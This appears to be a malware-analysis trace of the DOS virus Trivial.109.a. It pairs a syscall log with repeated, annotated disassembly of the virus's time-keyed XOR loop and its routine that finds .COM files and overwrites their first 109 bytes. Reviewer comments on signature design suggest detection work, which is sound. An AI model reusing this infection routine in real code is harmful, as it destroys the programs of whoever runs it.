Sample viewer

vx.netlux.org/Virus.DOS.Trivial.109.a


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:41.536145766Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Excerpt of the traced sample's code following the "Get time" call. It starts mid-routine
; and stops at 0x12a86, before the write/close calls that the trace rows below report.
; The instruction at 0x12a59 (row above) saves DL as a one-byte XOR key at [0x109];
; DOS function 2Ch (decimal 44 in the Op column) returns hundredths of a second in DL.
0x12a5d: mov si, 0x112                  ; source offset of the bytes to encode
0x12a60: mov di, 0x177                  ; destination buffer offset
0x12a63: mov cx, 0x5b                   ; counter = 0x5b (91)
0x12a66: lodsb al, byte ptr [si]        ; loop top: read one source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR it with the key byte
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; exits only once CX has wrapped to 0xFFFF, so the loop runs
0x12a70: jne 0x12a66                    ; 0x5c (92) times, one more than the 91 bytes written later
0x12a72: pop ax                         ; AX was pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0                      ; attribute mask 0 for the file search
0x12a76: mov dx, 0x167                  ; DX = offset of the search pattern; contents not shown (every match ends in .COM)
0x12a79: int 0x21                       ; traced below as "Find first file"
0x12a7b: jb 0x12aa3                     ; carry set = no match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; AH=3Dh open, AL=01 write-only
0x12a80: mov dx, 0x9e                   ; 0x9E = filename field of the default DTA (0x80 + 0x1E); assumes the DTA was not moved
0x12a83: int 0x21                       ; traced below as opening 'SLEEP.COM'
0x12a85: xchg ax, bx                    ; returned handle into BX (handle 5 in the trace)
0x12a86: mov ah, 0x40                   ; AH=40h write; the excerpt ends before the call is issued
; NOTE(review): the trace shows two writes per file (18 + 91 = 109 bytes, matching the ".109" in
; the sample name) and no seek call after a write-only open, so they presumably land at offset 0
; and replace the start of the target file rather than append to it. Because the key follows the
; clock, the 91-byte encoded body differs per file; a signature is better anchored on the 18-byte
; part, and if that part is 0x100-0x111 (not shown) the key byte at 0x109 lies inside it and needs
; a wildcard.
2018-12-17T23:07:41.539595787Z 78 PC: 12a7b | Find first file
2018-12-17T23:07:41.545501315Z 61 PC: 12a85 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:41.55169776Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.558439748Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.56114992Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.57434435Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'PRINT.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.576752337Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.57918331Z 61 PC: 12a85 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:07:41.58532326Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.591538731Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.594333608Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.60273657Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'HELLO.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.604941624Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.608710897Z 61 PC: 12a85 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:07:41.615069243Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.621381328Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.624500968Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.632068676Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'PHANG.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.634085175Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.637062997Z 61 PC: 12a85 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:07:41.643442253Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.649892308Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.652874562Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.660460682Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'PRINTA~1.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.662543094Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.665503934Z 61 PC: 12a85 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:07:41.672653692Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.679195315Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.682510921Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.689863445Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'MANDEL.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.691893153Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.694823222Z 61 PC: 12a85 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:07:41.701191638Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.707462532Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.710575844Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.718003925Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'PAH.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.720129369Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.723206714Z 61 PC: 12a85 | Open file (Filename = 'PAH.COM')
2018-12-17T23:07:41.729476864Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.736465176Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.739561808Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.748228913Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; traced below as opening 'TEST.COM'
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the trace then shows 18- and 91-byte writes and a close
2018-12-17T23:07:41.750682243Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.753499992Z 61 PC: 12a85 | Open file (Filename = 'TEST.COM')
2018-12-17T23:07:41.760964649Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.763674516Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.766191107Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.774253213Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
; Encode-and-search excerpt for this iteration; the listing is cut off after 0x12a86.
; Key byte at [0x109] = DL from the "Get time" call (stored by the instruction on the row above).
0x12a5d: mov si, 0x112                  ; source offset
0x12a60: mov di, 0x177                  ; destination offset
0x12a63: mov cx, 0x5b                   ; counter = 91
0x12a66: lodsb al, byte ptr [si]        ; read source byte
0x12a67: xor al, byte ptr [0x109]       ; XOR with the time-derived key
0x12a6b: stosb byte ptr es:[di], al     ; store encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1                     ; loop ends when CX wraps to 0xFFFF (92 passes)
0x12a70: jne 0x12a66
0x12a72: pop ax                         ; AX pushed outside this excerpt; presumably the find function number
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167                  ; offset of the search pattern (contents not shown)
0x12a79: int 0x21                       ; traced below as "Find next file"
0x12a7b: jb 0x12aa3                     ; carry set = no further match: leave via 0x12aa3 (not shown)
0x12a7d: mov ax, 0x3d01                 ; open, write-only
0x12a80: mov dx, 0x9e                   ; filename field of the default DTA (assumes the DTA was not moved)
0x12a83: int 0x21                       ; open call; the visible trace ends before any matching "Open file" row
0x12a85: xchg ax, bx                    ; file handle into BX
0x12a86: mov ah, 0x40                   ; AH=40h write; the excerpt ends before the call is issued
2018-12-17T23:07:41.776431674Z 79 PC: 12a7b | Find next file